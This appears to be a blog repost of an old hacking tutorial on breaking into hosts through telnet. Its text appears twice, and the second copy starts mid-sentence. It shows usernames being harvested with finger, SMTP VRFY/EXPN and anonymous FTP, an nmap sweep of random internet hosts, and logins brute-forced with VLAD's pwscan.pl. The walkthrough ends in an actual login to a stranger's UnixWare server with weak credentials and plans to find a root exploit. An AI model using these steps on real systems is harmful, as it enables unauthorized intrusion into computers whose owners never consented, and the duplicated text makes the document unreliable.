The most prized port to find open could be the telnet port. An open telnet
port usually denotes an UNIX host or a router. Sometimes an AS400 or
mainframe could be found. Why are we excited about an open telnet port? The
reason is twofold. First - the host may contain sensitive data in
directories that are not properly protected - see the section on "finding
the goods". The second reason is that UNIX hosts are the ideal "relaunch"
platform. What I mean by this is that your should be able to upload your
entire "toolbox" to the server, that you should be able to attack hosts that
are usually fire walled or not routed from this server. Even if you are not
able to upload a toolbox you should be able to telnet to other (internal)
servers from a router or a UNIX server. How do we go about getting a shell
(or Router prompt)? Usually a username and a password are required. In some
cases only a username is needed, and in some cases only a password is needed
for Cisco routers. The bottom line is that we need two or less "things" - be
that a username or a password. How do we find these two things? There are
some techniques to find a username (many of these techniques were used in
our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an
incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to
expand (EXPN) list-like aliases such as abuse, info, list, all etc. In
many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look
at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it
should be shadowed, it may reveal valid usernames
5. Try anonymous FTP and do a cd ~user_to_test_for- see the section on
FTP.
6. Use default usernames. A nice list of default usernames and passwords
can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the host name or a derivative of the host name as username.
9. See if the host is running a web server and have a look at the website
- you might learn more than you expect - look at the "Contact" section
and see if you can't mine some usernames. Looking at the website may
also help you to guess common usernames.
Ok, so now you have a rather long list of possible usernames. The idea would
be to verify that these users exist. It would be a bonus if you could verify
that the users exist. If we cannot verify that the user is valid we have to
test it via the telnet protocol. We still need a password. Unfortunately
there is no easy way to verify a password - you have to test this manually.
Manually?! I don't think so! Bind View Corporation's RAZOR security team
provided the world with VLAD(get it here
http://razor.bindview.com/tools/vlad/), a tool that packaged some very
useful tools. One of these tools has the ability to test usernames and
passwords for (amongst other things) telnet. (The tool does not have support
for password only telnet daemons - such as some routers, but the author
tells me they are looking into it). Without getting too involved in this
tool, lets see how our technique works against an arbitrary host (to find a
totally arbitrary host we use nmap to find a random host with open port 23:
nmap -sT -iR -p 23) Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25, and find that there are no mail daemon running - no
EXPN or VFRY possibilities. It seems that there are no anonymous FTP - no
getting the password file. The finger daemon is also not running. Let us
leave this host alone - we don't want to offend XXX - they have implemented
some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is
running Send mail and finger. When we do a finger command, we find many
usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if can use these usernames with common
passwords. We use VLAD's brute force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132,
with the usernames in the file account.db. The output of the pwscan.pl PERL
script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v 1.17 2000/07/24 17:14:43
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find ..nothing. No
username could be brute forced. Now what? The next step is to find more
usernames. We attempt to the following:
finger test@216.xxx.140.132
The output looks like this:
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
Last login Fri Aug 4 12:10 on pts038 from www.multiuser.cH
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password
- we test it manually. The "monotest" user however delivers...logging in
with username "monotest", and password "monotest" we gain access to the UNIX
host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
Copyright (c) 1976-1998 The Santa Cruz Operation, Inc. and its suppliers.
All Rights Reserved.
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
Last login: Fri Aug 4 12:10:15 2000 on pts038
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all
usernames that contains the word "test". In the same way we can finger users
such as "admin", and "user", and get interesting results.
Most machines that are running telnet, and has more than a certain amount of
users (mostly multi-user machines) almost always hosts users with weak or no
passwords - the idea is just to find them. From here it is fairly certain
that you will find a local SCO exploit that will elevate you to root.
port usually denotes an UNIX host or a router. Sometimes an AS400 or
mainframe could be found. Why are we excited about an open telnet port? The
reason is twofold. First - the host may contain sensitive data in
directories that are not properly protected - see the section on "finding
the goods". The second reason is that UNIX hosts are the ideal "relaunch"
platform. What I mean by this is that your should be able to upload your
entire "toolbox" to the server, that you should be able to attack hosts that
are usually fire walled or not routed from this server. Even if you are not
able to upload a toolbox you should be able to telnet to other (internal)
servers from a router or a UNIX server. How do we go about getting a shell
(or Router prompt)? Usually a username and a password are required. In some
cases only a username is needed, and in some cases only a password is needed
for Cisco routers. The bottom line is that we need two or less "things" - be
that a username or a password. How do we find these two things? There are
some techniques to find a username (many of these techniques were used in
our previous penetration testing example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an
incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to
expand (EXPN) list-like aliases such as abuse, info, list, all etc. In
many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look
at finger techniques :)
4. Try anonymous FTP and get the password file in /etc. Although it
should be shadowed, it may reveal valid usernames
5. Try anonymous FTP and do a cd ~user_to_test_for- see the section on
FTP.
6. Use default usernames. A nice list of default usernames and passwords
can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the host name or a derivative of the host name as username.
9. See if the host is running a web server and have a look at the website
- you might learn more than you expect - look at the "Contact" section
and see if you can't mine some usernames. Looking at the website may
also help you to guess common usernames.
Ok, so now you have a rather long list of possible usernames. The idea would
be to verify that these users exist. It would be a bonus if you could verify
that the users exist. If we cannot verify that the user is valid we have to
test it via the telnet protocol. We still need a password. Unfortunately
there is no easy way to verify a password - you have to test this manually.
Manually?! I don't think so! Bind View Corporation's RAZOR security team
provided the world with VLAD(get it here
http://razor.bindview.com/tools/vlad/), a tool that packaged some very
useful tools. One of these tools has the ability to test usernames and
passwords for (amongst other things) telnet. (The tool does not have support
for password only telnet daemons - such as some routers, but the author
tells me they are looking into it). Without getting too involved in this
tool, lets see how our technique works against an arbitrary host (to find a
totally arbitrary host we use nmap to find a random host with open port 23:
nmap -sT -iR -p 23) Nmap finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25, and find that there are no mail daemon running - no
EXPN or VFRY possibilities. It seems that there are no anonymous FTP - no
getting the password file. The finger daemon is also not running. Let us
leave this host alone - we don't want to offend XXX - they have implemented
some measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is
running Send mail and finger. When we do a finger command, we find many
usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk '{print $1}' | uniq > usernames
The next step would be to see if can use these usernames with common
passwords. We use VLAD's brute force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132,
with the usernames in the file account.db. The output of the pwscan.pl PERL
script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v 1.17 2000/07/24 17:14:43
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find ..nothing. No
username could be brute forced. Now what? The next step is to find more
usernames. We attempt to the following:
finger test@216.xxx.140.132
The output looks like this:
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
Last login Fri Aug 4 12:10 on pts038 from www.multiuser.cH
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password
- we test it manually. The "monotest" user however delivers...logging in
with username "monotest", and password "monotest" we gain access to the UNIX
host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
Copyright (c) 1976-1998 The Santa Cruz Operation, Inc. and its suppliers.
All Rights Reserved.
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
Last login: Fri Aug 4 12:10:15 2000 on pts038
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all
usernames that contains the word "test". In the same way we can finger users
such as "admin", and "user", and get interesting results.
Most machines that are running telnet, and has more than a certain amount of
users (mostly multi-user machines) almost always hosts users with weak or no
passwords - the idea is just to find them. From here it is fairly certain
that you will find a local SCO exploit that will elevate you to root.
No comments:
Post a Comment